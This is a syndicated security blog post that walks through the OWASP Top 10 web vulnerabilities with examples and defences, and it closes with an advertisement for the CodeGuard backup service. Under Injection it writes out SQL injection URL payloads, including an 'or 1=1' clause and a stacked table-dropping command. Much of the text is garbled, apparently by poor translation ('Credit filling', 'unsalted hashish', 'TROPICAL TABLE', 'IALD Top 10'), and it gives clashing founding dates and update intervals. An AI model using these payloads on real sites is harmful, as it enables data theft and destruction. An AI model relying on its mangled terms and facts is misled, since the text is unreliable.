Keep Your Site Safe with the OWASP Top 10 List

Find out how OWASP Top 10 can help protect you from the most dangerous security threats

The security of the web is a constantly evolving area, and the threats are endless. When one threat is stopped, it is only a matter of time before the other takes its place. For developers of web applications and websites, the target always moves to the extent necessary for protection. Whether you are developing the next big idea or trying to keep an existing product or company, you will want to keep the fruits of your labour.

But how do we know, with so many threats lurking in cyberspace, which ones are the most critical and widespread? Wouldn’t it be great if there was a simple list with them all on it? Well, it’s your lucky day. That’s because the Open Web Application Security Project (OWASP) has created these Top 10 of the biggest threats to your website.

This list, which is updated every two years, is a standard document for the sector that should be read by everyone who manages the site. Without them you could have stayed away from the most dangerous vulnerabilities instead of limiting the risks during development and implementation.

What are the ten greatest weaknesses and how can you adequately protect yourself against them? And what’s the best way to proceed if you’re the victim of one of them?

Let’s go make hash.

What is OWASP?

Before we get to the top ten OWASPs, let’s talk about OWASP itself. The OWASP Foundation was established on 1 December 2001 and was established on 21 December. April 2004 in the United States as a non-profit organization. Since its foundation almost two decades ago, the number of volunteers worldwide has reached almost 32,000. It is a well-known and reliable name in the industry, with more than 275 local offices worldwide.

Since its inception, OWASP’s mission has been to improve the security of the software. They use the open community model, which means that everyone can contribute to their projects, events, webinars and more. They provide free material and information which can be consulted on their website. They produce a wide range of media, including videos, software tools, forums, live and virtual events and educational resources.

Essentially, OWASP is a repository for everything related to web application security, drawing on the diverse knowledge and experience of OWASP’s members, who are open to the community. The aim of the group is to help organizations create, develop, implement, operate and maintain secure websites and applications. In addition to providing a range of articles, methods, documentation and technologies, OWASP members also conduct safety assessments and research.

However, they are better known, the OWASP Top 10 list.

What are the top 10 OWASPs?

The OWASP Top 10 list describes security issues for websites and applications. It was first published in 2003 and is generally reviewed every three to four years based on developments in the AppSec market. The list was updated in 2004, 2007, 2010, 2013 and 2017.

The OWASP Top 10 focuses on the most critical vulnerabilities, examining the risks, impact and best countermeasures to address them. The list was compiled by a team of security experts from around the world and is intended to make organizations more aware of the main threats they face. OWASP recommends that all companies implement the findings of the report in their security processes and methods to minimize these vulnerabilities in their products.

The vulnerabilities themselves are assessed on the basis of four different criteria:

• Prevalence – is this vulnerability well known to threators (such as hackers)?
• Detectability – Is it easy for threatenors to detect a vulnerability within an application?
• Ease of use – is it easy for threats to actually exploit a vulnerability once they have found it?
• Business consequences – how serious will the consequences of the operation be for the company carrying out the application?

In the original list, vulnerabilities were grouped by type so that the authors could cover most of the territory. However, it was difficult for readers to determine which weaknesses had the highest priority because there were no statistics available to quantify them. This has therefore become a subjective task for the public, as there are large differences in the types of applications and threat models between organizations. After lengthy discussions, OWASP finally decided to propose a simpler list of the top 10 companies it considers relevant to a wide range of companies (it should be noted, however, that the listings are not in any particular order).

Importance of OWASP Top 10

The most useful aspect of the OWASP Top 10 list is that it contains useful information to help the organization focus its security efforts on the most important and effective areas. As a result, the list has been adopted as a standard requirement by many of the world’s leading companies (including PCI DSS for payment processing). An organization’s inability to address the OWASP Top 10 points is a strong indicator for auditors that they do not meet the standards.

Web application attacks have become the leading cause of confirmed data breaches, according to Verizon’s 2018 Data Security Survey Report. Unfortunately, many organizations are still struggling to implement and maintain an effective application security program because they simply don’t know where to start. The OWASP Top 10 list can help fill this gap by serving as an excellent starting point as it covers the vulnerabilities most likely to be exploited (and potentially creates data gaps that are very uncomfortable for both your business and your customers). By repairing them, you significantly reduce the risk of costly interruptions.

And research shows that such measures are extremely necessary. As you can see below, application speeds are still alarming when it comes to the OWASP Top 10 policy. Perhaps even more worrying is the fact that after the initial analysis of the top 10 OWASP vulnerabilities, there is only a slight increase in compliance, indicating that most companies do not take the results of the analysis seriously.

Image source : Veracode

Most of the items on the OWASP Top 10 list are not that difficult to find and fix, but deactivation is often done internally because the developers are often not very well trained in cybersecurity or secure encryption. Conversely, security teams do not always have the most accurate idea of what application security actually means. It is not enough to scan or test multiple critical applications once with the pen. Instead of everything that an organisation develops or purchases, it needs to be continually evaluated at all stages of its lifecycle to be effective. It is important to scan for the OWASP Top 10 list, but it is also not a panacea. This should be part of a broader corporate safety strategy.

Now that we’ve seen what this list is and how to use it, let’s take a closer look at these annoying vulnerabilities!

Manage digital certificates as a pattern

14 Certification of good management practices to ensure performance, safety and full compliance with your company’s requirements

Top 10 OWASPVulnerabilities

#1 – Injection

What is it?

Injection attacks can be carried out on objects such as databases (SQL, noSQL), operating systems or servers (using protocols such as LDAP). They occur when hostile data is passed on to the interpreter as part of a request or order. This information then defrauds the interpreter by carrying out orders that would otherwise be forbidden to outsiders. It can also be used to access private data without proper authentication.

Example

Suppose you have opened an e-commerce store and access a specific product by typing in your browser’s address bar:

• http://www.yourstore.com/catalog/item.asp?itemid=999

Where 999 generates an SQL query to indicate what 999 stands for. The attacker can manipulate them by entering something like that:

• http://www.yourstore.com/items/item.asp?itemid=999 or 1=1

The SQL query is generated:

Image source : Imperial

But because 1 is always 1, every object name and description is returned (even the ones the owner doesn’t want you to see).

You can continue by registering:

• http://www.estore.com/items/iteam.asp?itemid=999 ; TROPICAL TABLE

It now becomes an SQL :

Image source : Imperial

The end result? Remove your table!

How to protect yourself

• Verification and/or cleansing of data provided by the user (verification rejects suspicious data and cleans up suspicious parts of the data)
• the introduction of controls to minimise the amount of information
• Use a secure API to avoid the need for a translator.
• Use SQL controls such as LIMIT and others to prevent mass disclosure of records.

#2 – Fraudulent authentication

What is it?

Incorrect authentication refers to cases where the authentication and session management functions have been implemented incorrectly. Identifying data such as passwords, keys or session tokens can be compromised, and weaknesses can also be used to steal the identity of other users. Attacks can even gain access to an administrator account, endangering the entire system.

Example

Credit filling is an example of an attack with failed authentication. This happens when attackers use lists of known passwords (e.g. from a data breach) to gain access, with the application acting as an authentication mechanism for each password attempt.

How to protect yourself

• Use of multi-factor authentication
• Reduction of implementation speed to reduce the number of failed connection attempts
• Do not use the system’s standard references
• Select passwords based on section 5.1.1 of NIST 800-63B.
• Use of the built-in server-side session manager

#3 – Influence of confidential data

What is it?

Sensitive data is uploaded when web applications and APIs cannot adequately protect sensitive data such as financial or health information. This weakly secured data can easily be stolen by attackers to commit fraud, identity theft and other crimes.

Example

If a website does not use SSL/TLS for all pages, an attacker may monitor traffic, change connections from HTTPS to HTTP, and then steal session cookies to gain access.

Another example is unsalted hashish. If simple hashes are used to store passwords and the hacker accesses the database, the hashes can be easily cracked.

How to protect yourself

• Identification of confidential data and use of appropriate management tools
• Encryption of all sensitive data, both on the move and in standby mode.
• Disable caching of all confidential information and do not store it unnecessarily.
• Keep passwords with strong and salty hash functions such as Scrypt, Bcrypt and Argon2.

#4 – External XML elements (XXE)

What is it?

These attacks target web applications that analyze XML data. Older or misconfigured XML processors can evaluate links to external objects (e.g. the hard disk) in XML documents. This may result in the XML parser sending data to an unauthorised external entity, which may then send sensitive data directly to the attacker.

Example

The following XML code can be used to get data from the server:

Image source : Imperial

But an attacker can get information on a private network by going from the ENTITY line to the next one:

Image source : Imperial

How to protect yourself

• Repair all old XML parsers
• Disable the use of external entities in XML applications.
• Let web applications only accept less complex data types (such as JSON).
• Avoid serialization
• Check the XML with XSD or other verification tools.
• Whitelisting and server-side XML input disinfection

#5 – Broken access control

What is it?

This is the case when restrictions on what authenticated users can or cannot do are misapplied. Attacks may benefit from unauthorized access, including access and modification of user accounts, confidential files, user data, access rights, etc.

Example

Suppose you have a web application that can accept SQL calls to get information about your account without authentication:

Source image : Imperial

The acct parameter can be changed to access an account of your choice:

Source image : Imperial

How to protect yourself

• Standard denial of access for anything but public funds.
• Build powerful access control mechanisms and deploy them everywhere.
• Do not let users create, play or delete records.
• Disable the list of server folders and do not save metadata in the root folder.
• Logging of failed access attempts and creation of alert messages
• Limiting the speed of access to the PLC

#6 – Wrong safety configuration

What is it?

This is the most common vulnerability in the OWASP Top 10 list and is usually due to the use of standard configurations/validations or the display of unnecessarily long error messages. These messages have the potential to identify vulnerabilities within the application.

Example

An example is a database that has standard user references from the manufacturer. It is impossible to facilitate the task of an attacker with a username and password for the administrator.

Another example is the display of an error message, as shown below:

As you can see, the details of the application code are made public and can be used by a malicious third party. A much simpler error message in plain language is sufficient.

How to protect yourself

• Delete all unused functions in the indicator.
• Display only general error messages that do not reveal too much information.
• Use the Static Application Security Testing (SAST) program to determine the risks of exposure to error reporting information.

#7 – Crosses (XXS)

What is it?

This type of vulnerability is ultimately the result of poor session management and occurs when web applications allow users to add user code to a URL or site that is displayed to other users. The malicious JavaScript can then be executed in your browser.

Example

A hacker can send an e-mail to a person claiming to be a reputable bank and include a link to the bank’s website in an e-mail. However, the link may contain malicious code added at the end of the URL. If the bank’s website is not properly secured, the malicious code is executed after clicking on it in the victim’s browser.

How to protect yourself

• Use a Web Application Firewall (WAF) that uses signature-based filtering to identify and block attackers.
• Use frameworks that go beyond XSS design and get to know the limits of your XSS protection, so you can handle issues not covered by XSS.
• Apply context-sensitive encryption when editing documents in the client browser.

#8 – Hazardous de-serialization

What is it?

During serialization, the objects are converted from the application code to a format that can be used for other purposes, such as streaming. Deserialization is reversed, allowing hackers to run malicious code on the server. Even if a vulnerability does not lead to remote code execution, attackers can still use it to perform actions such as repeat attacks, injection attacks and privilege escalation attacks.

Example

The analogy is this: when you come in. Serialization consists of packing the boxes with all your goods. Deserialisation takes place when you unpack it at a new location. A dangerous de-serialization would be for chargers to add, remove and rearrange items before they are unpacked.

For example, as in the real example, a PHP forum uses serialization to store a cookie with the user ID, password and account level:

Image source : OWASP

The hacker can change the serialized object to make it an administrator:

Image source : OWASP

How to protect yourself

• Monitor deserialization
• Verification of the type of execution
• Prohibit the de-serialization of data from unreliable sources.

#9 – Use of components with known vulnerabilities

What is it?

Web developers often use existing components in applications to avoid redundancy while providing the required functionality. Attackers look for vulnerabilities in these components that they can use to carry out attacks on the application itself. The most popular components can be used on hundreds of thousands of websites, and a single vulnerability can jeopardize them all.

Example

The injury of Equifax in 2017 is a perfect example of this kind of vulnerability. This was due to the Apache Struts release, where an existing vulnerability was discovered six months before the attack. If they had just read the top 10 of the OWASP list first, they could have saved $700 million!

How to protect yourself

• Always look for the latest security patches and updates for your components.
• Remove unused elements from your project
• Obtaining components only from reliable sources
• Use the SCA (Software Composition Analysis) tools to identify obsolete or hazardous parts.

#10 – Insufficient recording and monitoring

What is it?

Registration and monitoring must be carried out on a regular basis to ensure the security of the website. If you don’t, you increase the risk of attacks and you may not be able to react when they occur. The average detection time is about 200 days.  This gives attackers enough time to crack, extract or destroy data, switch to other systems and generally get angry.

Example

Earlier we talked about account replenishment, where cybercriminals repeatedly try to make use of the leakage of username and password pairs.  Let’s say after 100 attempts they finally found the right combination for a certain account.  Because there was no recording or monitoring, no one was ever warned about the alarming number of connection attempts.  Otherwise the activity would have been classified as suspicious and the offence could easily have been avoided.

How to protect yourself

• Set up logging and monitoring of all aspects of your web application.
• Create an incident response plan with alerts so that you are immediately aware of a possible attack.
• Make sure your newspapers have a format that can easily be used by centralized newspaper management solutions.
• Configure your logs so they have enough context to identify suspicious accounts.

Coding in relation to Top 10OWASP

Most importantly, your team should fully understand the vulnerabilities on the OWASP Top 10 list and not use coding tools and techniques that could leave you alone. Encryption frameworks that enable developers to find and fix vulnerabilities because they code better.

However, the best encryption methods and tools cannot always protect against human error, so it is always good to take additional measures, such as automatic website protection with WAF. Ideally, it should be part of a range of application layer technologies and services, including dynamic and static analysis. Static analysis is performed in a non-functional environment, where the application is viewed from the inside via the source code. Dynamic analysis is the opposite and consists of manipulating the application at runtime to discover vulnerabilities.

Once you have the right encryption methods, the right tools and the right security software, it’s a matter of implementing organizational best practices.

Organisational strategy for protection against IALD Top 10

Many companies still use aspects of the waterfall design methodology, so they are waiting for the end of the safety test cycle. This often leads to a long list of last-minute vulnerabilities for the development team. It takes time to repair them, which delays publication, causes friction between developers and security teams, and is detrimental to the company.

In response, many companies have looked for ways to secure their code at every stage from the beginning (not only to prevent cyber attacks, but also to prevent security teams and developers from literally attacking each other). A popular and effective way to do this is to involve security personnel from the earliest stages of product development. This cross-pollination enables both parties to contribute and learn from each other. For example, problems with the OWASP Top 10 can be magnified during periods of low load when usage is not as high as shortly before release.

What should be done if the top 10 OWASP vulnerabilities are used?

All the protection measures and strategies we have discussed seem excellent in theory, but in practice they are not always the easiest to implement. Of course, security incidents can occur, even if you think you’re being careful. What if the injury actually happened? Time is money, and you’ll lose them both every second your website is down. Not to mention the negative impact that any form of closure can have on customer confidence.

One of the best ways to make backups as fast as possible and with minimal impact is by using the website of the backup service. If you have a backup site, you can easily stop hacking, crashes, malware infections, bad updates, etc.

It is preferable to use automatic backup because it is easy to forget to do it manually.  You’ll also want a service that’s not on your side of the fence.  If a hacker breaks into your system, chances are he can remove your local backups just as easily.  Web hosts often offer backup services, but their functionality is often inconvenient and limited because they focus on server level instead of web level.  You have to present your ticket, wait for the answer and cannot select a specific date or files.

Sectigo’s CodeGuard is an example of a website backup solution that ticks all the boxes above. It keeps track of all changes to your site and automatically backs up your site’s files and databases on a daily basis, as shown below:

If anything happens at that moment, it’s literally a one-click recovery process. All you have to do is log in and select the last backup (or another) and you make and run a backup immediately.

Another advantage of a service like CodeGuard is that it is not only a backup program. You’ll get it, too:

• Malware scanning that automatically detects and removes malware before it becomes a problem.
• Email Backup Service
• WordPress plugin for making automatic backups of WordPress sites
• Website migration tool for a quick and easy relocation of your website
• Setting up servers to test old backups
• Fully functional API to configure CodeGuard for you or your customers.

It works with all major web platforms and thanks to the user-friendly interface, everything is ready to use in less than 5 minutes. First, install the root folder of your website (or, if you are using the WordPress plugin, just install it and enter a unique key).

Then define your backup settings:

And CodGard does everything else. If you need to recover later, it’s a quick and easy process:

In a few seconds your website will be restored to its former state.

Protect your site with CodeGuard Backup

It is like an undo button to repair damage caused by a bug, cyber attack, bad update or other problems.

OWASP Top 10 – a valuable tool in your safety arsenal

As we have seen, the OWASP Top 10 is an excellent basis for your security measures. The protection of objects in the OWASP Top 10 should really be the minimum and ideally the first step towards a more comprehensive security system for your company. By protecting you from the most common vulnerabilities, you reduce the risk considerably and immediately.

Combine this with the right AppSec and organizational best practices to get you started in the long run. No matter where you are in the process, violations are always possible. You need an emergency plan such as the CodeGuard to get back online as soon as possible. Like your homeland security system, you hope it will never be used. But if you do, you’ll be very happy to have it!

*** This is the syndicated Security Bloggers Network blog from Hashed Out by The SSL Store™, written by Mark Vojtko. The original message can be found at the following address: https://www.thesslstore.com/blog/keep-your-site-safe-with-the-owasp-top-10-list/.

Related Tags:

owasp top 10 2020,owasp top 10 2017,owasp top 10 2019 pdf,owasp top 10 cheat sheet,broken authentication,learn owasp top 10,in which year did the owasp top 10 begin,imperva owasp,how is owasp top 10 developed?,injection attacks occur when,broken authentication attacks occur when,owasp top 10 benefits,what is owasp firewall,ease of exploitability,owasp wordpress,owasp top 10 vulnerabilities,owasp top 10 2017 in detail,owasp top 10 2017 mcq,sensitive data exposure netsparker,owasp compliance checklist,owasp wordpress plugin,wordpress security documentation,wordpress com security,wordpress vulnerability,which of the following do developers use for the owasp top 10,owasp top 10 2020 pdf,owasp top 10 vulnerabilities 2019,which owasp top 10 2017 item focuses on trusted application building blocks,owasp top 10 2019,owasp top 10 pdf,what is owasp